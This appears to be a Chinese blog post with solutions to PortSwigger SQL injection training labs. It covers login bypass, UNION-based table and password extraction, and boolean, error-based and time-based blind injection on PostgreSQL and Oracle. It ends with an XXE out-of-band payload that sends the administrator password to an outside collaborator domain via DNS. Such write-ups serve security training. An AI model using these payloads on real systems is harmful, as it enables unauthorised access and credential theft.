portswigger靶场SQL注入实验
作者:互联网
portswigger靶场SQL注入实验
SQL注入
原理
SQL注入漏洞的形成原因是:用户输入被SQL解释器执行
注入类型
注入的两大类型
- 数字型注入
- 字符型注入
按照请求方式分类
- GET注入
- POST注入
- Cookie注入
- HTTP header注入
按照是否有回显分类
- 显注
- 盲注
常见的注入手法
报错注入
报错注入就是利用了数据库的某些机制,人为地制造错误条件,使得查询结果能够出现在错误信息中。
布尔注入
页面只返回True和False两种类型页面。利用页面返回不同,逐个猜解数据
联合注入
在已有的系统语句上,通过联合查询可以查询到数据库中的其他内容,输出的列数需要一致
延时注入/时间盲注
页面不会返回错误信息,且只会回显一种界面。主要特征是利用sleep函数,制造时间延迟,由回显时间来判断构造的条件是否正确
带外注入
带外通道技术(OOB)让攻击者能够通过另一种方式来确认和利用没有直接回显的漏洞。
这一类漏洞中,攻击者无法通过恶意请求直接在响应包中看到漏洞的输出结果。
带外通道技术通常需要利用漏洞来生成带外的TCP/UDP/ICMP请求,然后,攻击者可以通过这个请求来提取数据。
宽字节注入
开发人员对为了防止注入会选择转义掉'字符,使其失去控制效果。在注入点输入(')会被转义为(\')编码后为(%5c%27)
在GBK编码下,%DF%5C正好组成(運),所以会把\"吃掉",使(')逃逸
堆叠注入
在;结束一个SQL语句后继续构造下一条语句,使多条语句顺序执行
二次注入
来自数据库的内容有时候也是不可靠的。
当注册账号为:admin’#。如果前端做了转义处理,在接收到数据时为:admin\’#,前端不会产生SQL注入。
该用户修改密码的情况下,更新语句条件会变为:where user=‘admin’#’and password=‘123’
可以在不知道用户admin密码的情况下更新其密码
portswigger靶场
靶场网址
介绍
Portswigger是著名神器Burpsuite的官方网站,实际上也是一个非常好的漏洞训练平台,其训练内容非常侧重于对Burpsuite各项功能的深入挖掘。
实验二、登陆绕过
靶场
说明
This lab contains an SQL injection vulnerability in the login function.
To solve the lab, perform an SQL injection attack that logs in to the application as the `administrator` user.
题解
Modify the username parameter, giving it the value: administrator'--
实验三、确定查询返回的列数
靶场
说明
This lab contains an SQL injection vulnerability in the product category filter. The results from the query are returned in the application's response, so you can use a UNION attack to retrieve data from other tables. The first step of such an attack is to determine the number of columns that are being returned by the query. You will then use this technique in subsequent labs to construct the full attack.
To solve the lab, determine the number of columns returned by the query by performing an attack that returns an additional row containing null values.
题解
' union select '','','' -- '
实验四、查找包含文本的列
靶场
说明
This lab contains an SQL injection vulnerability in the product category filter. The results from the query are returned in the application's response, so you can use a UNION attack to retrieve data from other tables. To construct such an attack, you first need to determine the number of columns returned by the query. You can do this using a technique you learned in a previous lab. The next step is to identify a column that is compatible with string data.
The lab will provide a random value that you need to make appear within the query results. To solve the lab, perform an SQL injection UNION attack that returns an additional row containing the value provided. This technique helps you determine which columns are compatible with string data.
题解
Pets' union select NULL,'OdeAKf',NULL -- '
实验五、从其他表中检索数据
靶场
retrieve-data-from-other-tables
说明
This lab contains an SQL injection vulnerability in the product category filter. The results from the query are returned in the application's response, so you can use a UNION attack to retrieve data from other tables. To construct such an attack, you need to combine some of the techniques you learned in previous labs.
The database contains a different table called users, with columns called username and password.
To solve the lab, perform an SQL injection UNION attack that retrieves all usernames and passwords, and use the information to log in as the administrator user.
题解
获取管理员密码后登录
' union select username,password from users where username='administrator'-- '
实验六、在一列中检索多个值
靶场
retrieve-multiple-values-in-single-column
说明
This lab contains an SQL injection vulnerability in the product category filter. The results from the query are returned in the application's response so you can use a UNION attack to retrieve data from other tables.
The database contains a different table called users, with columns called username and password.
To solve the lab, perform an SQL injection UNION attack that retrieves all usernames and passwords, and use the information to log in as the administrator user.
题解
首先确定字段数,再检测文本在第几个字段,最后在该字段查询user表用户名为administrator的密码,然后登录
Pets' union select NULL,password from users where username='administrator'-- '
官解:采用字符串拼接,将账号和密码放在同一字段内查询出来
'+UNION+SELECT+NULL,username||'~'||password+FROM+users--
实验七、获取Oracle数据库类型和版本
靶场
querying-database-version-oracle
说明
This lab contains an SQL injection vulnerability in the product category filter. You can use a UNION attack to retrieve the results from an injected query.
To solve the lab, display the database version string.
提示
On Oracle databases, every SELECT statement must specify a table to select FROM. If your UNION SELECT attack does not query from a table, you will still need to include the FROM keyword followed by a valid table name.
There is a built-in table on Oracle called dual which you can use for this purpose. For example: UNION SELECT 'abc' FROM dual
题解
提示中说到Oracle数据库查询的时候必须带上from,使用from默认表dual确定查询的字段数为两个
' union select 'a','b' from dual
然后查询数据库版本
' union select banner,NULL from v$version --
实验八、获取Mysql和Microsoft数据库类型和版本
靶场
querying-database-version-mysql-microsoft
说明
This lab contains an SQL injection vulnerability in the product category filter. You can use a UNION attack to retrieve the results from an injected query.
To solve the lab, display the database version string.
题解
与实验七类似
' union select version(),'' --
实验九、列出非Oracle数据库上的数据库内容
靶场
listing-database-contents-non-oracle
说明
This lab contains an SQL injection vulnerability in the product category filter. The results from the query are returned in the application's response so you can use a UNION attack to retrieve data from other tables.
The application has a login function, and the database contains a table that holds usernames and passwords. You need to determine the name of this table and the columns it contains, then retrieve the contents of the table to obtain the username and password of all users.
To solve the lab, log in as the administrator user.
题解
- 首先查找注入点,确定字段数目,然后确定数据库类型为Postgre、
' union select version(),NULL --
# 返回PostgreSQL 11.15 (Debian 11.15-1.pgdg90+1) on x86_64-pc-linux-gnu, compiled by gcc (Debian 6.3.0-18+deb9u1) 6.3.0 20170516, 64-bit
- 根据Postgre数据库特性查找数据表信息
' union select table_name,NULL from information_schema.tables --
# 查找与users有关信息,表名为users_aawdcg
- 根据表名查找字段信息
' union select column_name,NULL from information_schema.columns where table_name='users_feertj' --
# 表中共有两个字段,username_hcekhs及password_jrbkza
- 根据字段名和表名查找密码
' union select username_hcekhs,password_jrbkza from users_feertj --
# 因为刚好是两个字段,可以直接select *
' union select * from users_feertj --
实验十、列出Oracle上的数据库内容
靶场
listing-database-contents-oracle
说明
This lab contains an SQL injection vulnerability in the product category filter. The results from the query are returned in the application's response so you can use a UNION attack to retrieve data from other tables.
The application has a login function, and the database contains a table that holds usernames and passwords. You need to determine the name of this table and the columns it contains, then retrieve the contents of the table to obtain the username and password of all users.
题解
- oracle数据库必须在查询后带上表名,第一步判断字段数
Gifts' union select NULL,NULL from dual --
- 查询数据表
' union select table_name,NULL from user_tables --
- 查找用户表的字段
' union select column_name,NULL from all_tab_columns where table_name='USERS_THOWFV' --
- 根据查找到的字段查询用户名和密码
' union select USERNAME_EBFGFL,PASSWORD_LPNHXW from USERS_THOWFV --
实验十一、带条件响应的SQL盲注
靶场
说明
This lab contains a blind SQL injection vulnerability. The application uses a tracking cookie for analytics, and performs an SQL query containing the value of the submitted cookie.
The results of the SQL query are not returned, and no error messages are displayed. But the application includes a "Welcome back" message in the page if the query returns any rows.
The database contains a different table called users, with columns called username and password. You need to exploit the blind SQL injection vulnerability to find out the password of the administrator user.
To solve the lab, log in as the administrator user.
题解
- 题目说明提醒了注入点在cookies里的TrackingId字段,且是盲注,查询语句成功与否在于页面是否显示"Welcome back",使用and测试注入点
AdaFLRQSl4CNI1mZ' and '1'='1
AdaFLRQSl4CNI1mZ' and '1'='0
- 确定表名为users
AdaFLRQSl4CNI1mZ' and (select 'a' from users)='a
- 确定管理员密码的用户名和长度,确定administrator用户密码长度为20
AdaFLRQSl4CNI1mZ' and (select 'a' from users where username='administrator' and length(password)>1)='a
AdaFLRQSl4CNI1mZ' and (select 'a' from users where username='administrator' and length(password)>10)='a
...
AdaFLRQSl4CNI1mZ' and (select 'a' from users where username='administrator' and length(password)=20)='a
- 开始猜解密码,使用burpsuite爆破,使用substring将20位密码逐位猜解,playload为0-9,a-z。正确的playload响应的长度比错误的多一位,最后得到全部20位密码
AdaFLRQSl4CNI1mZ' and (select substring(password,1,1) from users where username='administrator')='0
- 得到结果,使用密码登录管理员账号,成功
AdaFLRQSl4CNI1mZ' and (select password from users where username='administrator')='qgbvsw68icew39goc4n5
实验十二、带错误条件的SQL盲注
靶场
说明
This lab contains a blind SQL injection vulnerability. The application uses a tracking cookie for analytics, and performs an SQL query containing the value of the submitted cookie.
The results of the SQL query are not returned, and the application does not respond any differently based on whether the query returns any rows. If the SQL query causes an error, then the application returns a custom error message.
The database contains a different table called users, with columns called username and password. You need to exploit the blind SQL injection vulnerability to find out the password of the administrator user.
To solve the lab, log in as the administrator user.
题解
- 查找注入点
5jQtXyfrvRvkebz2' # 报错
5jQtXyfrvRvkebz2'' # 不报错
5jQtXyfrvRvkebz2' and 1=1 -- # 不报错
5jQtXyfrvRvkebz2' and 1=0 -- # 不报错,到这里说明无论查询是否返回结果,都不会报错
5jQtXyfrvRvkebz2' and aaa -- # 报错,猜测当存在sql错误的时候,返回错误
5jQtXyfrvRvkebz2' and (select 'a')='a' -- # 报错,继续尝试
5jQtXyfrvRvkebz2' and (select 'a' from dual)='a' -- # 不报错,确认数据库为oracle
5jQtXyfrvRvkebz2' and (select 'a' from aaaa)='a' -- # 报错,说明当数据库出现错误(语法错误或查询的表不存在)的时候会报错
- 确定表名为users,字段名为username和password
5jQtXyfrvRvkebz2' and (select 'a' from users)='a' -- # 不报错,说明存在users表
5jQtXyfrvRvkebz2' and (select 'a' from users where username='' and password='')='a' -- # 不报错,说明表中有username和password字段
- 无论查询是否返回结果,都不会报错,所以当查询不到结果的时候要人为的抛出错误,使用oracle条件语句
5jQtXyfrvRvkebz2' and (SELECT CASE WHEN (1=1) THEN 'a' ELSE to_char(1/0) END FROM dual)='a' -- # 不报错
5jQtXyfrvRvkebz2' and (SELECT CASE WHEN (1=0) THEN 'a' ELSE to_char(1/0) END FROM dual)='a' -- # 报错
- 使用条件语句猜解密码长度为20位
5jQtXyfrvRvkebz2' and (SELECT CASE WHEN length(password)>0 THEN 'a' ELSE to_char(1/0) END FROM users where username='administrator')='a' --
5jQtXyfrvRvkebz2' and (SELECT CASE WHEN length(password)>1 THEN 'a' ELSE to_char(1/0) END FROM users where username='administrator')='a' --
...
5jQtXyfrvRvkebz2' and (SELECT CASE WHEN length(password)=20 THEN 'a' ELSE to_char(1/0) END FROM users where username='administrator')='a' --
- 使用substr()和burpsuite逐一破解,正确的密码响应长度较长
5jQtXyfrvRvkebz2' and (SELECT CASE WHEN (select substr(password,1,1) from users where username='administrator')='0' THEN 'a' ELSE to_char(1/0) END FROM dual)='a' -- # 逐一修改
- 拼接20位,得到管理员密码
实验十三、延时盲注
靶场
说明
This lab contains a blind SQL injection vulnerability. The application uses a tracking cookie for analytics, and performs an SQL query containing the value of the submitted cookie.
The results of the SQL query are not returned, and the application does not respond any differently based on whether the query returns any rows or causes an error. However, since the query is executed synchronously, it is possible to trigger conditional time delays to infer information.
To solve the lab, exploit the SQL injection vulnerability to cause a 10 second delay.
题解
'||(select pg_sleep(10))--
实验十四、延时盲注和信息检索
靶场
说明
This lab contains a blind SQL injection vulnerability. The application uses a tracking cookie for analytics, and performs an SQL query containing the value of the submitted cookie.
The results of the SQL query are not returned, and the application does not respond any differently based on whether the query returns any rows or causes an error. However, since the query is executed synchronously, it is possible to trigger conditional time delays to infer information.
The database contains a different table called users, with columns called username and password. You need to exploit the blind SQL injection vulnerability to find out the password of the administrator user.
To solve the lab, log in as the administrator user.
题解
- 判断sql延时注入点
0DeLq71QXa4q6Tyr'||(select pg_sleep(10))--
- 添加条件判断
0DeLq71QXa4q6Tyr'||(select case when 1=1 then pg_sleep(10) else NULL end)-- # 产生时延
0DeLq71QXa4q6Tyr'||(select case when 1=0 then pg_sleep(10) else NULL end)-- # 没有时延
- 确定表名和管理员名字
0DeLq71QXa4q6Tyr'||(select case when username='administrator' then pg_sleep(10) else NULL end from users where username='administrator')-- # 产生时延
- 确定密码长度
0DeLq71QXa4q6Tyr'||(select case when length(password)>0 then pg_sleep(10) else NULL end from users where username='administrator')--
0DeLq71QXa4q6Tyr'||(select case when length(password)>10 then pg_sleep(10) else NULL end from users where username='administrator')--
.....
0DeLq71QXa4q6Tyr'||(select case when length(password)=20 then pg_sleep(10) else NULL end from users where username='administrator')--
- 使用burp对密码的逐个位置爆破
0DeLq71QXa4q6Tyr'||(select case when substring(password,1,1)='l' then pg_sleep(10) else NULL end from users where username='administrator')--
实验十五、带外注入
靶场
说明
This lab contains a blind SQL injection vulnerability. The application uses a tracking cookie for analytics, and performs an SQL query containing the value of the submitted cookie.
The SQL query is executed asynchronously and has no effect on the application's response. However, you can trigger out-of-band interactions with an external domain.
To solve the lab, exploit the SQL injection vulnerability to cause a DNS lookup to Burp Collaborator.
题解
oracle 发出dns请求
x' UNION SELECT extractvalue(xmltype('<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [ <!ENTITY % remote SYSTEM "http://'||(SELECT password FROM users WHERE username='administrator')||'.s0tepbytd3wxf9edi6v1uq84ivoocd.burpcollaborator.net/"> %remote;]>'),'/l') FROM dual--
实验十六、带外注入携带数据
靶场
说明
This lab contains a blind SQL injection vulnerability. The application uses a tracking cookie for analytics, and performs an SQL query containing the value of the submitted cookie.
The SQL query is executed asynchronously and has no effect on the application's response. However, you can trigger out-of-band interactions with an external domain.
The database contains a different table called users, with columns called username and password. You need to exploit the blind SQL injection vulnerability to find out the password of the administrator user.
To solve the lab, log in as the administrator user.
题解
同实验十五
x' UNION SELECT extractvalue(xmltype('<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [ <!ENTITY % remote SYSTEM "http://'||(SELECT password FROM users WHERE username='administrator')||'.s0tepbytd3wxf9edi6v1uq84ivoocd.burpcollaborator.net/"> %remote;]>'),'/l') FROM dual--
标签:username,users,--,portswigger,SQL,靶场,password,select 来源: https://www.cnblogs.com/zhoujinxuan/p/16242842.html